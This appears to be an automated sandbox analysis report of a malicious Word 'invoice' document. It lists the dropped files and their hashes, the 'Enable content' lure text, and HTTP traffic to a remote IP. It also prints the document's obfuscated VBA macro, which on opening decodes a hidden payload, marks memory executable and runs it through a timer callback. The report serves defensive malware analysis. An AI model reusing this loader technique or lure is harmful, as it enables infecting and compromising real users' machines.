Preview:	.././...T.h.i.s. .d.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .p.r.e.v.i.o.u.s. .v.e.r.s.i.o.n. .o.f. .M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .W.o.r.d.....T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .. E.n.a.b.l.e. .e.d.i.t.i.n.g.. .b.u.t.t.o.n. .o.n. .t.h.e. .t.o.p. .b.a.r.,. .a.n.d. .t.h.e.n. .c.l.i.c.k. .. E.n.a.b.l.e. .c.o.n.t.e.n.t.. ..........................................................................................................................................................z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{BED8643F-71E8-40CE-8636-E16E70F1E391}.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rm[1].htm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	201
Entropy (8bit):	5.110875983732391
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3bIGKCezocKqD:J0+oxBeRmR9etdzRxbIYez1T
MD5:	6DFF44B8B60DD046290A5420717F052E
SHA1:	2339B6BC052682B5CC618733AEEE776037485D3E
SHA-256:	2E519B2E823E2503B635A59BBC29A00170F18F86BC7F5330563188B105FF87D7
SHA-512:	02E47727BE33B93C4CA538A0E089720C0AC6D7CDC758216ECE0AD3380A75C151D9E2C6BA66A564209E3AC750720CBD3E415FA202ADE20852785D507C488076C3
Malicious:	false
Reputation:	low
IE Cache URL:	http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "rm" was not found on this server.</p>.</body></html>.

C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	61952
Entropy (8bit):	6.1891584557780455
Encrypted:	false
SSDEEP:	768:vV+4s9C36jbgktDymekZ+bRnbSEln5IyYpamDjobj8S47:vc8ms1mibRJln5IUmDjoX07
MD5:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
SHA1:	BCC5DC3222034D3F257F1FD35889E5BE90F09B5F
SHA-256:	4E15AA13A02798E924C63537E458A09415C48DAE0E7AFD5A3D25532A2AA935EE
SHA-512:	85C94763698448275AD996805FD59A3A4789BEFB79BE2175E2BBFED1CE9A2D424500DCAF42FFA225C33FE7090F0FEDF6B7BED63168FEC64D112CD09559829AFE
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: c.exe, Detection: malicious, Browse Filename: edicomsrl file 18.07.doc, Detection: malicious, Browse Filename: edicomsrl,document,18.07.doc, Detection: malicious, Browse Filename: rbtGr2unq7.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Generic.Cryptor.X.E2AE8007.47.dll, Detection: malicious, Browse Filename: SecuriteInfo.com.Generic.Cryptor.X.E2AE8007.47.dll, Detection: malicious, Browse Filename: QABqf4Xbw3.exe, Detection: malicious, Browse Filename: ntelos.file.06.27.2022.doc, Detection: malicious, Browse Filename: g.exe, Detection: malicious, Browse Filename: S.exe, Detection: malicious, Browse Filename: rB0luE6pL6.dll, Detection: malicious, Browse Filename: I3Iz02L0Am.dll, Detection: malicious, Browse Filename: svc32.dll, Detection: malicious, Browse Filename: SecuriteInfo.com.DLOADER.Trojan.15098.dll, Detection: malicious, Browse Filename: sIhckM7o37.exe, Detection: malicious, Browse Filename: IhIrwzRKIW.exe, Detection: malicious, Browse Filename: 12CC7A3E17B45E971B1B950A6418E977D3FEDE2763FD7.exe, Detection: malicious, Browse Filename: MkFX3RptDN.exe, Detection: malicious, Browse Filename: zyvvMPPgTM.exe, Detection: malicious, Browse Filename: P4j99xQeuA.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...o...l...h..l..m.o.l...m..l...i..l...e...l....l...n..l.Rich.l.................PE..L...4^?..................b..........Pa............@..........................@............@.............................................hg...................0..D.......T........................... .......................lm..`....................text....a.......b.................. ..`.data................f..............@....idata...............h..............@..@.didat..............................@....rsrc...hg.......h..................@..@.reloc..D....0......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\y133.tmp.dll

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	201
Entropy (8bit):	5.110875983732391
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3bIGKCezocKqD:J0+oxBeRmR9etdzRxbIYez1T
MD5:	6DFF44B8B60DD046290A5420717F052E
SHA1:	2339B6BC052682B5CC618733AEEE776037485D3E
SHA-256:	2E519B2E823E2503B635A59BBC29A00170F18F86BC7F5330563188B105FF87D7
SHA-512:	02E47727BE33B93C4CA538A0E089720C0AC6D7CDC758216ECE0AD3380A75C151D9E2C6BA66A564209E3AC750720CBD3E415FA202ADE20852785D507C488076C3
Malicious:	true
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "rm" was not found on this server.</p>.</body></html>.

C:\Users\user\AppData\Local\Temp\~DFDCA04E6C9BCC80E5.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	4.448125275792641
Encrypted:	false
SSDEEP:	384:tSeDMwfrJProZex692dfGuRndWms9mJ2b2TaicChx/6SErnbD9S6yUDx3H/WmNHF:tS6XtcDYTxD/m3D9RNfVmaOe1ixGF9z
MD5:	5C3899053A1E3C08DBFF977B0A68AB3C
SHA1:	06A52736C5024E7524B6C4D62E51D57E9D1DAB44
SHA-256:	EF70EE70DE35B56F07A7E5397E0D2FC35901729D899F01D97E12B65AC6C2B45E
SHA-512:	42DAF9FB0FCD0E6F39EEA85ADE00E0B244564EC9684BEF214F36DD7A0BEF7D32C6FC8D53E15CF7D73435DD2DE067D79D79EB089DCC4631E585EDF4CB9C6E58A5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................F...........&........................................................................................................... ...!..."...#...$...%.......'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7.......9...:...;...<...=.......?...@...A...B...C...D...E...8...\...H...I...J...M...L.......N...O...P...Y...R...S...T...U...V...W...X...K...Z...[...].......^..._...`...........................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	115
Entropy (8bit):	4.714654512289214
Encrypted:	false
SSDEEP:	3:bDuMJlKCsAWWIKGHjXbbBCmX1mWfsAWWIKGHjXbbBCv:bC0s+GHjXbbBggs+GHjXbbBs
MD5:	CBD62476A1135C121FCB69226FC6EE4C
SHA1:	AA113B9F44A102C38F72BD322052EEDC5F92D398
SHA-256:	20A1C60E63FE08C27CA3DE3BCF4F12683005F925193266204AFBD17E8F13829D
SHA-512:	B733E41B4B76FC6A56060BE50357B07861F66536F2927303EBD21F2E03B497675004A3987BA768B9405260427B3CFED9B3920D5A52258975C48C92453E32DC62
Malicious:	false
Preview:	[folders]..Templates.LNK=0..wpswireless-invoice-08.11.22.doc.LNK=0..[doc]..wpswireless-invoice-08.11.22.doc.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\wpswireless-invoice-08.11.22.doc.LNK

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:46 2022, mtime=Thu Aug 11 23:58:01 2022, atime=Thu Aug 11 23:57:53 2022, length=2256213, window=hide
Category:	dropped
Size (bytes):	1145
Entropy (8bit):	4.69312404308806
Encrypted:	false
SSDEEP:	12:8vhaUO/EkRUpMcuElPCH2KAf1YIXe+WvUQPuDIrzfjAU/IvjXLtBIrzXDTDiP5i6:8vsx7LVAfTvQlrAUAvrSXD+g7aB6m
MD5:	AFFCFFB0E94A5E7269CFC282CD4C09F7
SHA1:	0D7C9D68CC3CF9E789C0BE0C14DCF928D7949947
SHA-256:	BDC4E15737DDBC6476F974D7942844DC35FB6F4DE42921BC1F0DDFD5477C935A
SHA-512:	69DAE40D380598E1BABF175D45205494993B47172442F841C92C5721F47384041E00608B9E8F29AD5610164928C212BAA5CDE078DC55B71D7452BDD77FBA65A1
Malicious:	true
Preview:	L..................F.... ....E...3...+b...........Um"..........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...U3.....................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..U3......S.....................Nd.h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..U4......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.Um"..U;. .WPSWIR~1.DOC..r......hT...U;.....h.........................w.p.s.w.i.r.e.l.e.s.s.-.i.n.v.o.i.c.e.-.0.8...1.1...2.2...d.o.c.......f...............-.......e...........>.S......C:\Users\user\Desktop\wpswireless-invoice-08.11.22.doc..7.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.w.p.s.w.i.r.e.l.e.s.s.-.i.n.v.o.i.c.e.-.0.8...1.1...2.2...d.o.c.........:..,.LB.)...As...`.......X.......855271...........!a..%.H.VZAj...U............-..!a..%.H.VZAj...U............-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.2346921606678025
Encrypted:	false
SSDEEP:	3:Rl/ZdtIc1/97UFlplttlqKEjFtttoln:RtZv3UBlg5ttOn
MD5:	926A99CC191B9D2D2FB12C50667D7898
SHA1:	901715232E9B4345F1D4CAE1F457D17CBEAE51CA
SHA-256:	F2A86CF265EC47A63C321CB294480285D5AD562F9036B8B3EA67E281AE56B044
SHA-512:	52F5136AB089FEF72F4375CFFBB922C29396E42FF6D6CD74A5885880D4F1179BDCD9908A3105AC3B36CFC3C25E60A84D51C9EA0B48F038A9BCD26FA7258991A0
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h...........#..9............................'..:..........T.......6C........;..;..............

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\Desktop\~$swireless-invoice-08.11.22.doc

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.2346921606678025
Encrypted:	false
SSDEEP:	3:Rl/ZdtIc1/97UFlplttlqKEjFtttoln:RtZv3UBlg5ttOn
MD5:	926A99CC191B9D2D2FB12C50667D7898
SHA1:	901715232E9B4345F1D4CAE1F457D17CBEAE51CA
SHA-256:	F2A86CF265EC47A63C321CB294480285D5AD562F9036B8B3EA67E281AE56B044
SHA-512:	52F5136AB089FEF72F4375CFFBB922C29396E42FF6D6CD74A5885880D4F1179BDCD9908A3105AC3B36CFC3C25E60A84D51C9EA0B48F038A9BCD26FA7258991A0
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h...........#..9............................'..:..........T.......6C........;..;..............

Static File Info

General

File type:	Zip archive data, at least v2.0 to extract
Entropy (8bit):	7.994091181083785
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	wpswireless-invoice-08.11.22.doc
File size:	2350727
MD5:	672ff75cfa223733b4d42382089a57b2
SHA1:	02dd6b448c2373dc1223724b1ab1aff920528aa6
SHA256:	aabc9295e27a673dcfb902960b8196a561923cef78ddb061956cb627fcfa782c
SHA512:	67ae70869362e5f55cec2655cbe924387baed91a0104abfb47ead979aac7b56684af5e5413b305ea1fdaeb5ccd7053e7ff398a341dd2fcc7c8b325f05ac2e272
SSDEEP:	49152:eT3UFkBPa/06xtvpz126ejPDkZ3T4EtUxFc2mpXfQK9B:qUke3v912tAJT45xF6pXfQK7
TLSH:	3BB533A9751FE67ED0C8DE700D12EA9433A7E9DE4AC8049CC234CAD21DFC225B55F85A
File Content Preview:	PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........\|.zs..z..z.X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q...;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.

File Icon


Icon Hash:	74f4c4c6c1cac4d8

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "/opt/package/joesandbox/database/analysis/682568/sample/wpswireless-invoice-08.11.22.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 2739

General
Stream Path:	VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	2739
Data ASCII:	. . . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t . i o n . . . . . . L . i b " u s e r . 3 2 " A l i a . s " S e t T i . m e r " ( B y V a l . . . . . . . . A s L o n g y . 1 , . . . . . .
Data Raw:	01 0e b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function  Lib "user32" Alias "SetTimer" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "user32" Alias "KillTimer" (ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "kernel32" Alias "VirtualProtect" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr,  As LongPtr) As LongPtr
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
Function (, Optional  = False)
    If  Then
         = Len()
    Else
         = ((), )
    End If
     = 
    End Function
Function (, Optional  = Empty, Optional  = Empty, Optional  = Empty)
    Select Case 
            Case ()
                Set  = (, True)
            Case ()
                Set  = (, True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, , True)
            Case ()
                 = (True)
            Case ()
                 = (, True)
        End Select
End Function
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), x8flLq("oQMjBoChn9f"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function ()
     = 10
    End Function
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), x8flLq("nsTo4UOnp"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function (, , Optional  = False)
    If  Then
         = Mid(,  + 1, 1)
    Else
         = ((), , )
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
         = VarPtr()
    Else
         = ((), )
    End If
     = 
    End Function
Function (Optional  = False)
    If  Then
         = Timer()
    Else
         = (())
    End If
     = 
    End Function
Function ()
     = 6
    End Function
Function ()
     = 1
    End Function
Function (, Optional  = False)
    If  Then
         = ()
    Else
         = ((), )
    End If
     = 
    End Function
Private Sub Document_Open()
    Dim () As Byte
    If () Then
         = ((x8flLq("FVKgOaQyiB")).Value)
    Else
         = ((x8flLq("SCImJHRhlw")).Value)
    End If
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
     = () + 1
     = VarPtr((0))
     , , 64, VarPtr()
            ()(x8flLq("hyBN_aoLp9r")) = x8flLq("NSdoR5j_gt")
         = (0, , 1, )
     1
     0, 
    ().Remove (x8flLq("nbh7jt"))
    ().Remove (x8flLq("DbSopo"))
    ReDim (1)
End Sub
Function (, Optional  = False)
    If  Then
         = UBound()
    Else
         = ((), )
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
        Set  = GetObject()
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function ()
     = 5
    End Function
Function (Optional  = False)
    If  Then
        Set  = CallByName((x8flLq("Jtmo0biJG8")), x8flLq("Csh99OPh1vt"), VbGet, x8flLq("SRJAAiC8wXlM"))
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Function (Optional  = False)
    If  Then
        Set  = ActiveDocument
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Function ()
     = 7
    End Function
Function ()
     = 2
    End Function
Function (, )
     = Mid(,  + 1, 1)
End Function
Function ()
     = 3
    End Function
Function ()
     = 4
    End Function
Function ()
     = 8
    End Function
Public Function x8flLq(strInput)
        x8flLq = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
    End Function
Function ()
     = 9
    End Function
Function (, Optional  = False)
    If  Then
         = CDec()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
    ReDim (() - 1) As Byte
    Dim  As Long,  As Long
    Dim :  = x8flLq("nSvwgtjkw") & x8flLq("xLJrsLiCHM")
    For  = 0 To () - 1 Step 2
         =  / 2
        () = 255 - ( & (, ) & (,  + 1))
    Next
     = 
End Function
Function ()
     = 0
    End Function
Sub (w)
    Dim  As Long
    Dim  As Long
     = () + ()
    Do
         = ()
        DoEvents
    Loop Until  > 
End Sub
Function ()
    #If Win64 Then
         = True
    #Else
         = False
    #End If
End Function
Function ()
     = 11
    End Function

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 365

General
Stream Path:	PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	365
Entropy:	5.260544526473288
Base64 Encoded:	True
Data ASCII:	I D = " { C 6 A 0 3 1 7 C - 6 7 D 6 - 4 9 C 1 - 8 B 7 0 - 9 3 8 0 6 A 5 0 A 3 C E } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E B E 9 2 2 5 9 0 9 5 D 0 9 5 D 0 9 5 D 0 9 5 D " . . D P B = " D 6 D 4 1 F 7 6 E 1 8 A C D 8 B C D 8 B C D " . . G C = " C 1 C 3 0 8 8 D 0 9 8 D 0 9 7 2 " . . . . [ H o s t E x t e n d e r I n f o ] . .
Data Raw:	49 44 3d 22 7b 43 36 41 30 33 31 37 43 2d 36 37 44 36 2d 34 39 43 31 2d 38 42 37 30 2d 39 33 38 30 36 41 35 30 41 33 43 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69

Stream Path: PROJECTwm, File Type: data, Stream Size: 41

General
Stream Path:	PROJECTwm
File Type:	data
Stream Size:	41
Entropy:	3.0773844850752607
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

Stream Path: VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7

General
Stream Path:	VBA/_VBA_PROJECT
File Type:	ISO-8859 text, with no line terminators
Stream Size:	7
Entropy:	1.8423709931771088
Base64 Encoded:	False
Data ASCII:	a . . .
Data Raw:	cc 61 ff ff 00 00 00

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 5100

General
Stream Path:	VBA/__SRP_2
File Type:	data
Stream Size:	5100
Entropy:	1.9204222100936061
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . " . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ) . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . q . . . . . .
Data Raw:	72 55 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 22 00 1f 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 2724

General
Stream Path:	VBA/__SRP_3
File Type:	data
Stream Size:	2724
Entropy:	2.7016840900812285
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . ` . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . Q . . . . . . . . . . . , . . p . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . ` . Q . . . . . . . . . . . X . . p . . . . . . Q . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 60 00 c1 08 00 00 00 00 00 00 00 00 00 00 00 00 04 70 10 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 486

General
Stream Path:	VBA/dir
File Type:	data
Stream Size:	486
Entropy:	6.296812220423808
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . . A d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . . m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A
Data Raw:	01 e2 b1 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 07 41 f4 64 2d 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 11, 2022 17:58:07.376005888 CEST	49741	80	192.168.2.3	45.8.146.139
Aug 11, 2022 17:58:07.479938030 CEST	80	49741	45.8.146.139	192.168.2.3
Aug 11, 2022 17:58:07.480216980 CEST	49741	80	192.168.2.3	45.8.146.139
Aug 11, 2022 17:58:07.488120079 CEST	49741	80	192.168.2.3	45.8.146.139
Aug 11, 2022 17:58:07.591932058 CEST	80	49741	45.8.146.139	192.168.2.3
Aug 11, 2022 17:58:07.607016087 CEST	80	49741	45.8.146.139	192.168.2.3
Aug 11, 2022 17:58:07.607184887 CEST	49741	80	192.168.2.3	45.8.146.139
Aug 11, 2022 17:58:12.614085913 CEST	80	49741	45.8.146.139	192.168.2.3
Aug 11, 2022 17:58:12.614252090 CEST	49741	80	192.168.2.3	45.8.146.139
Aug 11, 2022 17:59:47.779129028 CEST	49741	80	192.168.2.3	45.8.146.139
Aug 11, 2022 17:59:48.090137005 CEST	49741	80	192.168.2.3	45.8.146.139
Aug 11, 2022 17:59:48.699630022 CEST	49741	80	192.168.2.3	45.8.146.139
Aug 11, 2022 17:59:49.902785063 CEST	49741	80	192.168.2.3	45.8.146.139
Aug 11, 2022 17:59:52.402952909 CEST	49741	80	192.168.2.3	45.8.146.139
Aug 11, 2022 17:59:57.403424025 CEST	49741	80	192.168.2.3	45.8.146.139
Aug 11, 2022 18:00:07.091779947 CEST	49741	80	192.168.2.3	45.8.146.139

HTTP Request Dependency Graph

45.8.146.139

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49741	45.8.146.139	80	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
